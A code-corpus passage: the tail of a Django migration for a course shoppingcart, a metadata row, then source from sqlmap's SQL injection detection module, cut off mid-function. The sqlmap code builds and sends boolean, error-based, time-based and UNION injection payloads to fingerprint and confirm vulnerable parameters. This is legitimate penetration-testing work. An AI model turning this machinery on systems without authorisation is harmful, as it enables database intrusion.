'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'total_amount': ('django.db.models.fields.FloatField', [], {}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'refunded_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'fulfilled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '30', 'decimal_places': '2'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'refund_requested_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'report_comments': ('django.db.models.fields.TextField', [], {'default': "''"}),
'service_fee': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32', 'db_index': 'True'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.paidcourseregistrationannotation': {
'Meta': {'object_name': 'PaidCourseRegistrationAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.registrationcoderedemption': {
'Meta': {'object_name': 'RegistrationCodeRedemption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']", 'null': 'True'}),
'redeemed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 10, 2, 0, 0)', 'null': 'True'}),
'redeemed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'registration_code': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCode']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
| agpl-3.0 | 196,891,793,819,145,280 | 81.597884 | 182 | 0.558709 | false |
glaudsonml/kurgan-ai | tools/sqlmap/lib/controller/checks.py | 1 | 61798 | #!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import copy
import httplib
import random
import re
import socket
import time
from subprocess import Popen as execute
from extra.beep.beep import beep
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import extractTextTagContent
from lib.core.common import findDynamicContent
from lib.core.common import Format
from lib.core.common import getLastRequestHTTPError
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getSortedInjectionTests
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
from lib.core.common import listToStrValue
from lib.core.common import parseFilePaths
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import showStaticWords
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import urlencode
from lib.core.common import wasLastResponseDBMSError
from lib.core.common import wasLastResponseHTTPError
from lib.core.defaults import defaults
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.decorators import cachedmethod
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import NOTE
from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.threads import getCurrentThreadData
from lib.request.connect import Connect as Request
from lib.request.inject import checkBooleanExpression
from lib.request.templates import getPageTemplate
from lib.techniques.union.test import unionTest
from lib.techniques.union.use import configUnion
def checkSqlInjection(place, parameter, value):
# Store here the details about boundaries and payload used to
# successfully inject
injection = InjectionDict()
# Localized thread data needed for some methods
threadData = getCurrentThreadData()
# Set the flag for SQL injection test mode
kb.testMode = True
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
tests = getSortedInjectionTests()
seenPayload = set()
while tests:
test = tests.pop(0)
try:
if kb.endDetection:
break
if conf.dbms is None:
# If the DBMS has not yet been fingerprinted (via simple heuristic check
# or via DBMS-specific payload) and boolean-based blind has been identified
# then attempt to identify with a simple DBMS specific boolean-based
# test what the DBMS may be
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None:
kb.heuristicDbms = heuristicCheckDbms(injection)
# If the DBMS has already been fingerprinted (via DBMS-specific
# error message, simple heuristic check or via DBMS-specific
# payload), ask the user to limit the tests to the fingerprinted
# DBMS
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
# If the DBMS has been fingerprinted (via DBMS-specific error
# message, via simple heuristic check or via DBMS-specific
# payload), ask the user to extend the tests to all DBMS-specific,
# regardless of --level and --risk values provided
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
kb.heuristicDbms or injection.dbms):
msg = "for the remaining tests, do you want to include all tests "
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "level (%d)" % conf.level if conf.level < 5 else ""
msg += " and " if conf.level < 5 and conf.risk < 3 else ""
msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
title = test.title
kb.testType = stype = test.stype
clause = test.clause
unionExtended = False
if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)
if "[CHAR]" in title:
if conf.uChar is None:
continue
else:
title = title.replace("[CHAR]", conf.uChar)
elif "[RANDNUM]" in title or "(NULL)" in title:
title = title.replace("[RANDNUM]", "random number")
if test.request.columns == "[COLSTART]-[COLSTOP]":
if conf.uCols is None:
continue
else:
title = title.replace("[COLSTART]", str(conf.uColsStart))
title = title.replace("[COLSTOP]", str(conf.uColsStop))
elif conf.uCols is not None:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided custom column range %s" % conf.uCols
logger.debug(debugMsg)
continue
match = re.search(r"(\d+)-(\d+)", test.request.columns)
if injection.data and match:
lower, upper = int(match.group(1)), int(match.group(2))
for _ in (lower, upper):
if _ > 1:
unionExtended = True
test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns)
title = re.sub(r"\b%d\b" % _, str(2 * _), title)
test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title)
# Skip test if the user's wants to test only for a specific
# technique
if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "specified to test only for "
debugMsg += "%s techniques" % " & ".join(map(lambda x: PAYLOAD.SQLINJECTION[x], conf.tech))
logger.debug(debugMsg)
continue
# Skip test if it is the same SQL injection type already
# identified by another test
if injection.data and stype in injection.data:
debugMsg = "skipping test '%s' because " % title
debugMsg += "the payload for %s has " % PAYLOAD.SQLINJECTION[stype]
debugMsg += "already been identified"
logger.debug(debugMsg)
continue
# Parse DBMS-specific payloads' details
if "details" in test and "dbms" in test.details:
payloadDbms = test.details.dbms
else:
payloadDbms = None
# Skip tests if title, vector or DBMS is not included by the
# given test filter
if conf.testFilter and not any(conf.testFilter in str(item) or \
re.search(conf.testFilter, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is not included by the given filter"
logger.debug(debugMsg)
continue
# Skip tests if title, vector or DBMS is included by the
# given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg)
continue
if payloadDbms is not None:
# Skip DBMS-specific test if it does not match the user's
# provided DBMS
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "the provided DBMS is %s" % conf.dbms
logger.debug(debugMsg)
continue
# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific payload)
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
debugMsg = "skipping test '%s' because the identified " % title
debugMsg += "back-end DBMS is %s" % injection.dbms
logger.debug(debugMsg)
continue
# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific error message)
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
debugMsg = "skipping test '%s' because the parsed " % title
debugMsg += "error message(s) showed that the back-end DBMS "
debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
logger.debug(debugMsg)
continue
# If the user did not decide to extend the tests to all
# DBMS-specific or the test payloads is not specific to the
# identified DBMS, then only test for it if both level and risk
# are below the corrisponding configuration's level and risk
# values
if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
# Skip test if the risk is higher than the provided (or default)
# value
if test.risk > conf.risk:
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
debugMsg += "is higher than the provided (%d)" % conf.risk
logger.debug(debugMsg)
continue
# Skip test if the level is higher than the provided (or default)
# value
if test.level > conf.level:
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
debugMsg += "is higher than the provided (%d)" % conf.level
logger.debug(debugMsg)
continue
# Skip test if it does not match the same SQL injection clause
# already identified by another test
clauseMatch = False
for clauseTest in clause:
if injection.clause is not None and clauseTest in injection.clause:
clauseMatch = True
break
if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
debugMsg = "skipping test '%s' because the clauses " % title
debugMsg += "differ from the clause already identified"
logger.debug(debugMsg)
continue
# Skip test if the user provided custom character (for UNION-based payloads)
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided a specific character, %s" % conf.uChar
logger.debug(debugMsg)
continue
infoMsg = "testing '%s'" % title
logger.info(infoMsg)
# Force back-end DBMS according to the current test DBMS value
# for proper payload unescaping
Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
# Parse test's <request>
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\'')))
else:
boundaries = conf.boundaries
for boundary in boundaries:
injectable = False
# Skip boundary if the level is higher than the provided (or
# default) value
# Parse boundary's <level>
if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
continue
# Skip boundary if it does not match against test's <clause>
# Parse test's <clause> and boundary's <clause>
clauseMatch = False
for clauseTest in test.clause:
if clauseTest in boundary.clause:
clauseMatch = True
break
if test.clause != [0] and boundary.clause != [0] and not clauseMatch:
continue
# Skip boundary if it does not match against test's <where>
# Parse test's <where> and boundary's <where>
whereMatch = False
for where in test.where:
if where in boundary.where:
whereMatch = True
break
if not whereMatch:
continue
# Parse boundary's <prefix>, <suffix> and <ptype>
prefix = boundary.prefix if boundary.prefix else ""
suffix = boundary.suffix if boundary.suffix else ""
ptype = boundary.ptype
# Options --prefix/--suffix have a higher priority (if set by user)
prefix = conf.prefix if conf.prefix is not None else prefix
suffix = conf.suffix if conf.suffix is not None else suffix
comment = None if conf.suffix is not None else comment
# If the previous injections succeeded, we know which prefix,
# suffix and parameter type to use for further tests, no
# need to cycle through the boundaries for the following tests
condBound = (injection.prefix is not None and injection.suffix is not None)
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
condType = injection.ptype is not None and injection.ptype != ptype
# If the payload is an inline query test for it regardless
# of previously identified injection types
if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
continue
# For each test's <where>
for where in test.where:
templatePayload = None
vector = None
# Threat the parameter original value according to the
# test's <where> tag
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
origValue = value
if kb.tamperFunctions:
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
elif where == PAYLOAD.WHERE.NEGATIVE:
# Use different page template than the original
# one as we are changing parameters value, which
# will likely result in a different content
kb.data.setdefault("randomInt", str(randomInt(10)))
kb.data.setdefault("randomStr", str(randomStr(10)))
if conf.invalidLogical:
_ = int(kb.data.randomInt[:2])
origValue = "%s AND %s=%s" % (value, _, _ + 1)
elif conf.invalidBignum:
origValue = kb.data.randomInt[:6]
elif conf.invalidString:
origValue = kb.data.randomStr[:6]
else:
origValue = "-%s" % kb.data.randomInt[:4]
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
elif where == PAYLOAD.WHERE.REPLACE:
origValue = ""
kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place)
# Forge request payload by prepending with boundary's
# prefix and appending the boundary's suffix to the
# test's ' <payload><comment> ' string
if fstPayload:
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
if reqPayload:
if reqPayload in seenPayload:
continue
else:
seenPayload.add(reqPayload)
else:
reqPayload = None
# Perform the test's request and check whether or not the
# payload was successful
# Parse test's <response>
for method, check in test.response.items():
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# In case of boolean-based blind SQL injection
if method == PAYLOAD.METHOD.COMPARISON:
# Generate payload used for comparison
def genCmpPayload():
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Forge response payload by prepending with
# boundary's prefix and appending the boundary's
# suffix to the test's ' <payload><comment> '
# string
boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
return cmpPayload
# Useful to set kb.matchRatio at first based on
# the False response content
kb.matchRatio = None
kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
Request.queryPage(genCmpPayload(), place, raise404=False)
falsePage = threadData.lastComparisonPage or ""
# Perform the test's True request
trueResult = Request.queryPage(reqPayload, place, raise404=False)
truePage = threadData.lastComparisonPage or ""
if trueResult and not(truePage == falsePage and not kb.nullConnection):
# Perform the test's False request
falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
if not falseResult:
if kb.negativeLogic:
boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
errorResult = Request.queryPage(errorPayload, place, raise404=False)
if errorResult:
continue
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable:
trueSet = set(extractTextTagContent(truePage))
falseSet = set(extractTextTagContent(falsePage))
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
if candidates:
conf.string = candidates[0]
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
logger.info(infoMsg)
injectable = True
# In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP:
# Perform the test's request and grep the response
# body for the test's <grep> regular expression
try:
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue( \
[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
result = output == "1"
if result:
infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
except SqlmapConnectionException, msg:
debugMsg = "problem occurred most likely because the "
debugMsg += "server hasn't recovered as expected from the "
debugMsg += "error-based payload used ('%s')" % msg
logger.debug(debugMsg)
# In case of time-based blind or stacked queries
# SQL injections
elif method == PAYLOAD.METHOD.TIME:
# Perform the test's request
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
if trueResult:
# Confirm test's results
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
if trueResult:
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
# In case of UNION query SQL injection
elif method == PAYLOAD.METHOD.UNION:
# Test for UNION injection and set the sample
# payload as well as the vector.
# NOTE: vector is set to a tuple with 6 elements,
# used afterwards by Agent.forgeUnionQuery()
# method to forge the UNION query payload
configUnion(test.request.char, test.request.columns)
if not Backend.getIdentifiedDbms():
if kb.heuristicDbms is None:
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "
warnMsg += "back-end DBMS. You can try to "
warnMsg += "explicitly set it using option '--dbms'"
singleTimeWarnMessage(warnMsg)
else:
Backend.forceDbms(kb.heuristicDbms)
if unionExtended:
infoMsg = "automatically extending ranges for UNION "
infoMsg += "query injection technique tests as "
infoMsg += "there is at least one other (potential) "
infoMsg += "technique found"
singleTimeLogMessage(infoMsg)
elif not injection.data:
_ = test.request.columns.split('-')[-1]
if _.isdigit() and int(_) > 10:
if kb.futileUnion is None:
msg = "it is not recommended to perform "
msg += "extended UNION tests if there is not "
msg += "at least one other (potential) "
msg += "technique found. Do you want to skip? [Y/n] "
kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
if kb.futileUnion is False:
continue
# Test for UNION query SQL injection
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
if isinstance(reqPayload, basestring):
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
logger.info(infoMsg)
injectable = True
# Overwrite 'where' because it can be set
# by unionTest() directly
where = vector[6]
kb.previousMethod = method
if conf.dummy or conf.offline:
injectable = False
# If the injection test was successful feed the injection
# object with the test's details
if injectable is True:
# Feed with the boundaries details only the first time a
# test has been successful
if injection.place is None or injection.parameter is None:
if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
injection.parameter = place
else:
injection.parameter = parameter
injection.place = place
injection.ptype = ptype
injection.prefix = prefix
injection.suffix = suffix
injection.clause = clause
# Feed with test details every time a test is successful
if hasattr(test, "details"):
for dKey, dValue in test.details.items():
if dKey == "dbms":
injection.dbms = dValue
if not isinstance(dValue, list):
Backend.setDbms(dValue)
else:
Backend.forceDbms(dValue[0], True)
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
injection.dbms_version = Backend.setVersion(dValue)
elif dKey == "os" and injection.os is None:
injection.os = Backend.setOs(dValue)
if vector is None and "vector" in test and test.vector is not None:
vector = test.vector
injection.data[stype] = AttribDict()
injection.data[stype].title = title
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)
injection.data[stype].where = where
injection.data[stype].vector = vector
injection.data[stype].comment = comment
injection.data[stype].templatePayload = templatePayload
injection.data[stype].matchRatio = kb.matchRatio
injection.conf.textOnly = conf.textOnly
injection.conf.titles = conf.titles
injection.conf.string = conf.string
injection.conf.notString = conf.notString
injection.conf.regexp = conf.regexp
injection.conf.optimize = conf.optimize
if not kb.alerted:
if conf.beep:
beep()
if conf.alert:
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
logger.info(infoMsg)
process = execute(conf.alert, shell=True)
process.wait()
kb.alerted = True
# There is no need to perform this test for other
# <where> tags
break
if injectable is True:
kb.vulnHosts.add(conf.hostname)
break
# Reset forced back-end DBMS value
Backend.flushForcedDbms()
except KeyboardInterrupt:
warnMsg = "user aborted during detection phase"
logger.warn(warnMsg)
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default="S", checkBatch=False)
if choice[0] in ("s", "S"):
pass
elif choice[0] in ("c", "C"):
choice = None
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
if choice:
logger.warn("invalid value")
msg = "enter new verbosity level: [0-6] "
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
conf.verbose = int(choice)
setVerbosity()
tests.insert(0, test)
elif choice[0] in ("n", "N"):
return None
elif choice[0] in ("e", "E"):
kb.endDetection = True
elif choice[0] in ("q", "Q"):
raise SqlmapUserQuitException
finally:
# Reset forced back-end DBMS value
Backend.flushForcedDbms()
Backend.flushForcedDbms(True)
# Return the injection object
if injection.place is not None and injection.parameter is not None:
if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):
warnMsg = "in OR boolean-based injections, please consider usage "
warnMsg += "of switch '--drop-set-cookie' if you experience any "
warnMsg += "problems during data retrieval"
logger.warn(warnMsg)
if not checkFalsePositives(injection):
kb.vulnHosts.remove(conf.hostname)
injection.notes.add(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
else:
injection = None
if injection:
checkSuhosinPatch(injection)
checkFilteredChars(injection)
return injection
def heuristicCheckDbms(injection):
"""
This functions is called when boolean-based blind is identified with a
generic payload and the DBMS has not yet been fingerprinted to attempt
to identify with a simple DBMS specific boolean-based test what the DBMS
may be
"""
retVal = False
pushValue(kb.injection)
kb.injection = injection
for dbms in getPublicTypeMembers(DBMS, True):
randStr1, randStr2 = randomStr(), randomStr()
Backend.forceDbms(dbms)
if conf.noEscape and dbms not in FROM_DUMMY_TABLE:
continue
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)):
retVal = dbms
break
Backend.flushForcedDbms()
kb.injection = popValue()
if retVal:
infoMsg = "heuristic (extended) test shows that the back-end DBMS " # Not as important as "parsing" counter-part (because of false-positives)
infoMsg += "could be '%s' " % retVal
logger.info(infoMsg)
return retVal
def checkFalsePositives(injection):
"""
Checks for false positives (only in single special cases)
"""
retVal = True
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
pushValue(kb.injection)
infoMsg = "checking if the injection point on %s " % injection.place
infoMsg += "parameter '%s' is a false positive" % injection.parameter
logger.info(infoMsg)
def _():
return int(randomInt(2)) + 1
kb.injection = injection
for i in xrange(conf.level):
while True:
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
randInt1 = min(randInt1, randInt2, randInt3)
randInt3 = max(randInt1, randInt2, randInt3)
if randInt3 > randInt2 > randInt1:
break
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
retVal = False
break
# Just in case if DBMS hasn't properly recovered from previous delayed request
if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:
checkBooleanExpression("%d=%d" % (randInt1, randInt2))
if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): # this must not be evaluated to True
retVal = False
break
elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): # this must not be evaluated to True
retVal = False
break
elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): # this must be evaluated to True
retVal = False
break
elif checkBooleanExpression("%d %d" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement)
retVal = False
break
if not retVal:
warnMsg = "false positive or unexploitable injection point detected"
logger.warn(warnMsg)
kb.injection = popValue()
return retVal
def checkSuhosinPatch(injection):
"""
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
"""
if injection.place == PLACE.GET:
debugMsg = "checking for parameter length "
debugMsg += "constrainting mechanisms"
logger.debug(debugMsg)
pushValue(kb.injection)
kb.injection = injection
